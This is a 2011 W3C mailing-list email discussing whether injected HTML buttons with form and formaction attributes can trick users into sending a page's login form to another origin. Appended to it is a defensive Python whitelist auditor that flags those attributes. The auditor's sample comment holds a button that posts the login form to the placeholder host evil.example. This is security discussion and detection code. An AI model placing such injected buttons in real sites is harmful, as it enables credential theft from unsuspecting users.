- From: Ian Hickson <ian@hixie.ch>
- Date: Wed, 3 Aug 2011 22:56:45 +0000 (UTC)
- To: Philippe De Ryck <philippe.deryck@cs.kuleuven.be>
- Cc: public-html-comments@w3.org, Giles Hogben <Giles.Hogben@enisa.europa.eu>, Lieven Desmet <Lieven.Desmet@cs.kuleuven.be>
On Wed, 3 Aug 2011, Philippe De Ryck wrote:
> On Tue, 2011-08-02 at 21:50 +0000, Ian Hickson wrote:
> > On Tue, 2 Aug 2011, Philippe De Ryck wrote:
> > >
> > > The new form attributes, which can be used with submit buttons, can
> > > make it difficult for a user to distinguish the form that is being
> > > submitted. This can be used by an adversary to trick the user into
> > > submitting a form, such as an autocompleted login form. Even though
> > > this attack was already possible with JavaScript enabled, this new
> > > vector does not depend on scripts. Additionally, it is possible that
> > > current content validation filters do not yet prevent against button
> > > injection.
> >
> > Surely this was already possible by just injecting </form><form
> > action...> in the same place as the button would be inserted today?
>
> It is indeed very likely that form injection would also be possible. The
> difference however is that by injecting a button, you can trick the user
> into submitting a form that is located somewhere else on the page.

Oh, my apologies. I misunderstood. I thought you meant the new formaction,
etc, attributes, not the new "form" attribute.

So the attack you are concerned about is that a page that has both a form
for sensitive information and an area with user-generated content could be
attacked such that a victim is convinced to enter the sensitive information
in the form, and then convinced to submit the form using a button elsewhere
on the page, which, through the use of both the form="" attribute and the
formaction="" attribute, can then result in the form information being sent
to a different origin?

I always hesitate to minimise the risk in security risk assessments, but
this does seem somewhat convoluted. Are you aware of any page that has such
a form, accepts user input, and uses a blacklist rather than whitelist, and
allows <button> or <input> to be inserted unescaped but not <script>?

-- 
Ian Hickson               U+1047E                )\._.,--....,'``.    fL
http://ln.hixie.ch/       U+263A                /,   _.. \   _\  ;`._ ,.
Things that are impossible just take longer.   `._.-(,_..'--(,_..'`-.;.'
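As an added example (not part of this thread and not code from either correspondent), a whitelist-style check for user-generated HTML that reports the form="" / formaction="" family of attributes discussed above, as well as the injected <form> element Ian mentions; the sample comment and the evil.example origin are constructed placeholders.

```python
from html.parser import HTMLParser

# Attributes that let a control join a form it is not nested inside (form="")
# or override where and how that form is submitted (formaction="" and friends).
FORM_OVERRIDE_ATTRS = {"form", "formaction", "formmethod", "formenctype",
                       "formtarget", "formnovalidate"}

# Whitelist: the only tags user-generated content may contain. Anything else,
# including <button>, <input> and <form>, is reported rather than passed on.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "ul", "ol", "li",
                "blockquote", "code", "pre"}
ALLOWED_ATTRS = {"a": {"href", "title"}}


class FormInjectionAuditor(HTMLParser):
    """Collect (tag, reason) findings for markup that could associate a
    user-supplied control with a form elsewhere on the hosting page."""

    def __init__(self):
        super().__init__()
        self.findings = []

    # html.parser lower-cases tag and attribute names, and routes self-closing
    # syntax such as <input ... /> through handle_starttag as well.
    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.findings.append((tag, "tag not in whitelist"))
        for name, _value in attrs:
            if name in FORM_OVERRIDE_ATTRS:
                self.findings.append((tag, "form-association attribute: " + name))
            elif tag in ALLOWED_TAGS and name not in ALLOWED_ATTRS.get(tag, ()):
                self.findings.append((tag, "attribute not in whitelist: " + name))


def audit_user_html(fragment):
    """Return findings for a user-supplied HTML fragment; an empty list means
    the fragment uses only whitelisted tags and attributes."""
    auditor = FormInjectionAuditor()
    auditor.feed(fragment)
    auditor.close()
    return auditor.findings


# Constructed sample: a comment that a script-only blacklist would let through.
# It contains no <script>, yet the button targets the page's login form by id
# and redirects its submission to a placeholder attacker origin.
SAMPLE_COMMENT = (
    '<p>Nice post!</p>'
    '<button form="login" formaction="https://evil.example/collect">Continue</button>'
    '<input type="submit" form="login" formtarget="_blank" value="Next" />'
)

if __name__ == "__main__":
    for tag, reason in audit_user_html(SAMPLE_COMMENT):
        print(f"<{tag}>: {reason}")
```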
Received on Wednesday, 3 August 2011 22:57:18 UTC